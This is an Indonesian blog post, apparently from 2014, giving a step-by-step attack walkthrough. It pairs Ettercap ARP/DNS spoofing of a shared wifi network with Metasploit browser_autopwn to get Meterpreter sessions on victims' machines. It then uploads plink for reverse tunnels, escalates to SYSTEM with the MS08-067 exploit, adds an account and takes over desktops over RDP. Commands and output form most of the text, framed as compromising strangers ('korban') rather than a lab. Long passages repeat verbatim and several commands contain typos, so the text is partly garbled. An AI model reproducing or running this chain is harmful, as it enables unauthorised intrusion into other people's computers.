Firewall VS Msfconsole
- Published: Selasa,05 Agustus 2014 10:53
→ Nmap (Untuk memetakan jaringan tanpa menggunakan pket ICMP)
→ Msfconsole (software utama yang menyediakan Exploitasi untuk menembus host)
→ Ettercap (Membantu agar IP address atau DNS yang di akses merunah ke IP Attacker)
nmap [192.168.1.0/24]
perintah dari nmap di atas akan menyebabkan nmap melakukan pengiriman paket ICMP yang akan di block oleh firewall , dan hasilnya nihil atau nmap akan menampilkan koneksi yang di arahkan ke IP router yang sebgai getaway
perintah dari nmap di atas akan menyebabkan nmap melakukan pengiriman paket ICMP yang akan di block oleh firewall , dan hasilnya nihil atau nmap akan menampilkan koneksi yang di arahkan ke IP router yang sebgai getaway
setelah itu akan tampil semua host yang ada di dalam jaringan tersebut , kenapa ini berhasil karna perintah dari nmap -Pn menghindari paket ICMP menganti dengan paket ACK
kasus ini sama seperti tadi tidak akan bisa menggunakan exploit standar atau dengan code:
exploit/windows/smb/ms08_067_netapi
Karena perintah di atas yang ada akan menggunakan pket ICMP yang telah di block oleh firewall
Sekarang buka console kalian dan menuju ke msfconsole kalian:
root@N-gative:msfconsole
Gunakan auxiliary browser_autopwn untuk meracuni Browser taregt yang ada , dengan upload addons yang ada di msfconsole sebagai bah
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
tersu configure auxiliary untuk meracuni target
msf auxiliary(browser_autopwn) > set LHOST [ip address kamu]
msf auxiliary(browser_autopwn) > set SRVHOST [ip address kamu]
msf auxiliary(browser_autopwn) > set SRVPORT 80 [DNS yang di racuni dengan browser]
msf auxiliary(browser_autopwn) > set URIPATH /
lalu, jalankan auxiliary kalian
msf auxiliary(browser_autopwn) > exploit -j
sekarang tinggal tunggu sampai semuanya exploit dan payload berhasil di siapkan, kemudian kita akan bermain ke jaringan lagi uuuyyyy
nah kalau yang ini kan meracuni DNS sedangkan DNS ada karna untukmemudahkan manusiaatau sejenis dengan kita ni agar mudah menghafal dengan huruf dari pada angka ,karna itu kita harus nunggu seseorang mengakses IP kita -_- mau nangkring di warnet berapa hari pun ngak bakal ada yang akses mas -_-
sekarang buat aja mereka atau terget akses ip dengan cara kasar , alias DNS spoofing yang mengarahkan semua nama Domain ke host kita (bisa jadi tehnik DdoS ni kalau banyak yang online di warnet komputer nya bisa restart karna resource nya kemakan) maka edit aja etter.dns nya buat ettercapnya
Code:
root@N-gative:/#nano /usr/share/ettercap/etter.dns
Hapus semua, dan masukan
Code:
* A [IP address kamu]
Jika IP address kamu 192.168.1.10, maka
Code:
* A 192.168.1.10
Simpan konfigurasi, kemudian eksekusi spoofing dns menggunakan ettercap dengan cara berikut
Code:
root@N-gative:/#ettercap -i [interface] [option] /target 1/ /target 2/
Dalam kasus ini,berada di wifi area, IP address korban 192.168.1.10, dan IP address access poin 192.168.1.1
Maka
- Interface = wlan0
- target 1 = 192.168.1.1
- target 2 = 192.168.1.1/24
Masukan perintah ini ke dalam terminal:
Code:
root@N-gative:/#ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.255/
Dengan perintah di atas ettercap akan mengarahkan semua host yang ada begitu buka salah satu situs akan mengarah ke ip address kalian 10
Perhatikan output metasploit:
[*] request '/' from 192.168.1.XXX:1809
[*] request '/?essid=xxxxxxxxxxxxxx' from 192.168.1.XXX:1809
[*] responding with exploits
[*] ending internet explorer COM CreateObject Code Execution exploit HTML to 192.168.1.10:1809
[*] sending EXE payload to 192.168.1.114:1809
[*] sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:3333 ->192.168.1.XXX:1809)
di sini bisa banyak sekali address yang menjadi korban untuk di akkses ke root meterpreter tapi di ambil satu ajaXXX ada karna kita gunakan /24 yang bisa jadi ada 254 host yang aktif
root@N-gative:/#ettercap -i [interface] [option] /target 1/ /target 2/
Dalam kasus ini,berada di wifi area, IP address korban 192.168.1.10, dan IP address access poin 192.168.1.1
Maka
- Interface = wlan0
- target 1 = 192.168.1.1
- target 2 = 192.168.1.1/24
Masukan perintah ini ke dalam terminal:
Code:
root@N-gative:/#ettercap -i wlan0 -T -q -P dns_spoof -M ARP-REMOTE /192.168.1.1/ /192.168.1.255/
Dengan perintah di atas ettercap akan mengarahkan semua host yang ada begitu buka salah satu situs akan mengarah ke ip address kalian 10
Perhatikan output metasploit:
[*] request '/' from 192.168.1.XXX:1809
[*] request '/?essid=xxxxxxxxxxxxxx' from 192.168.1.XXX:1809
[*] responding with exploits
[*] ending internet explorer COM CreateObject Code Execution exploit HTML to 192.168.1.10:1809
[*] sending EXE payload to 192.168.1.114:1809
[*] sending stage (748032 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:3333 ->192.168.1.XXX:1809)
di sini bisa banyak sekali address yang menjadi korban untuk di akkses ke root meterpreter tapi di ambil satu ajaXXX ada karna kita gunakan /24 yang bisa jadi ada 254 host yang aktif
msf auxiliary(browser_autopwn) > session -i l
perintah di atas akan menjalankan meterpreter sesi awal
meterpreter > getuid
Outpunya:
user
Ini menunjukan bahwa pengguna bernama user.
meterpreter > shell
C:\Documents and Settings\user\Desktop> net user stdio stdio /add
perintah di atas akan gagal karna target menjalankan perintah di atas bukan sebagai admin (administrator)
C:\Documents and Settings\user\Desktop> netstat -an
perinah di atas akan menunjukan port 445 yang bisa di gunakan untuk upload file yang sudah ada di kali linux yang bisa merubah hak akses user biasa menjadi admin
C:\Documents and Settings\user\Desktop>exit
meterpreter > upload /usr/share/windows-binaries/plink.exe "C:\\documents and settings\user\desktop\\"
upload sukses dan coba kembali ke shell atau cmd untuk menjalankan program plink
meterpreter > shell
C:\Documents and Settings\user\Desktop>plink.exe -l [umane] -pw [password] -R port:localhost:port [ip address kamu]
Contoh dalam kasus ini,penulis ingin username penulis root, dan password toor, dengan port 445 yang terbuka, dan IP local host 127.0.0.1 dan ip address saya 192.168.1.10 maka:
-l = root
-pw = N
ip address = 192.168.1.10
Jadi masukan perintah ini:
C:\Documents and Settings\user\Desktop>pling.exe -l root -pw N- -R 445:127.0.0.1:445 192.168.1.10
Buka terminal baru dan ketik:
root@N-gative:~# netstat -antp |grep 445
pass 127.0.0.1 ada di dalam list, kalian siap melakukan exploitasi tahap berikutnya. Dengan eksekusi perintah berikut:
./pentest/exploits/framework3/msfconsole
Code:
msf > use exploit/windows/smb/ms08_067_netapi
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Code:
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.10
Code:
msf exploit(ms08_067_netapi) > set RHOST 127.0.01
Code:
msf exploit(ms08_067_netapi) > set RPORT 445
Code:
msf exploit(ms08_067_netapi) > exploit -j
OUTPUT:[*]Started reverse handler on 192.168.1.10:4444
[*]Automatically detecting the taget..
[*]Fingerprint: Windows XP Service Pack 2 - lang:English
[*]Selected Target: Windows XP SP 2 English (NX)
[*]Triggering the vulnerability...
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.10:1809)
meterpreter >
masuk ke sesi meterpreter kalian akan mencoba melihat akses kalian sebahai admin atau seorang user biasa dengan perintah di bawah ini
Code:
meterpreter > getuid
sekarang kalian sudah menjadi seorang admin, jadi outputnya akan berbeda dengan tadi sebagai user biasa
Code:
meterpreter > NT AUTHORITY\SYSTEM
untuk melanjutkan remote sekalian orangnya haha , bukan maksut saya desktop , kalian bisa menjadi hantu yang mengontroll full system atau host target , dengan menjalankan MP3 sendiri , mengunci file , menggerakan poiter mosuse pokoknya lengkap deh
meterpreter > shell
C:\WINDOWS\system32>cd c:\documents and settings\user\desktop
C:\Documents and Settings/user/Desktop> net stdio stdio /add
C:\Documents and Settings/user/Desktop> C:
C:\plink.exe -l root -pw N- 3389:127.0.0.1:3389 192.168.1.2
sekarang buka shell atau terminal baru untuk mencoba jadi hantu yang akan memegang desktop yang target ada
Code:
rdesktop 127.0.01
dengan username, gunakanroot
Dan untuk password, masukanN-.
SELESAI bro
meterpreter > shell
C:\Documents and Settings\user\Desktop>plink.exe -l [umane] -pw [password] -R port:localhost:port [ip address kamu]
Contoh dalam kasus ini,penulis ingin username penulis root, dan password toor, dengan port 445 yang terbuka, dan IP local host 127.0.0.1 dan ip address saya 192.168.1.10 maka:
-l = root
-pw = N
ip address = 192.168.1.10
Jadi masukan perintah ini:
C:\Documents and Settings\user\Desktop>pling.exe -l root -pw N- -R 445:127.0.0.1:445 192.168.1.10
Buka terminal baru dan ketik:
root@N-gative:~# netstat -antp |grep 445
pass 127.0.0.1 ada di dalam list, kalian siap melakukan exploitasi tahap berikutnya. Dengan eksekusi perintah berikut:
./pentest/exploits/framework3/msfconsole
Code:
msf > use exploit/windows/smb/ms08_067_netapi
Code:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Code:
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.10
Code:
msf exploit(ms08_067_netapi) > set RHOST 127.0.01
Code:
msf exploit(ms08_067_netapi) > set RPORT 445
Code:
msf exploit(ms08_067_netapi) > exploit -j
OUTPUT:[*]Started reverse handler on 192.168.1.10:4444
[*]Automatically detecting the taget..
[*]Fingerprint: Windows XP Service Pack 2 - lang:English
[*]Selected Target: Windows XP SP 2 English (NX)
[*]Triggering the vulnerability...
[*]Sending stage (748032 bytes)
[*]Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.10:1809)
meterpreter >
masuk ke sesi meterpreter kalian akan mencoba melihat akses kalian sebahai admin atau seorang user biasa dengan perintah di bawah ini
Code:
meterpreter > getuid
sekarang kalian sudah menjadi seorang admin, jadi outputnya akan berbeda dengan tadi sebagai user biasa
Code:
meterpreter > NT AUTHORITY\SYSTEM
untuk melanjutkan remote sekalian orangnya haha , bukan maksut saya desktop , kalian bisa menjadi hantu yang mengontroll full system atau host target , dengan menjalankan MP3 sendiri , mengunci file , menggerakan poiter mosuse pokoknya lengkap deh
meterpreter > shell
C:\WINDOWS\system32>cd c:\documents and settings\user\desktop
C:\Documents and Settings/user/Desktop> net stdio stdio /add
C:\Documents and Settings/user/Desktop> C:
C:\plink.exe -l root -pw N- 3389:127.0.0.1:3389 192.168.1.2
sekarang buka shell atau terminal baru untuk mencoba jadi hantu yang akan memegang desktop yang target ada
Code:
rdesktop 127.0.01
dengan username, gunakanroot
Dan untuk password, masukanN-.
SELESAI bro
jadi
hantunya hehehe “ridak semua browser bisa di racuni dengan
browser_auto_pwn , berbeda browser berbeda pula celah yang ada , mozzila
update dengan jave rhino”
Tidak ada komentar:
Posting Komentar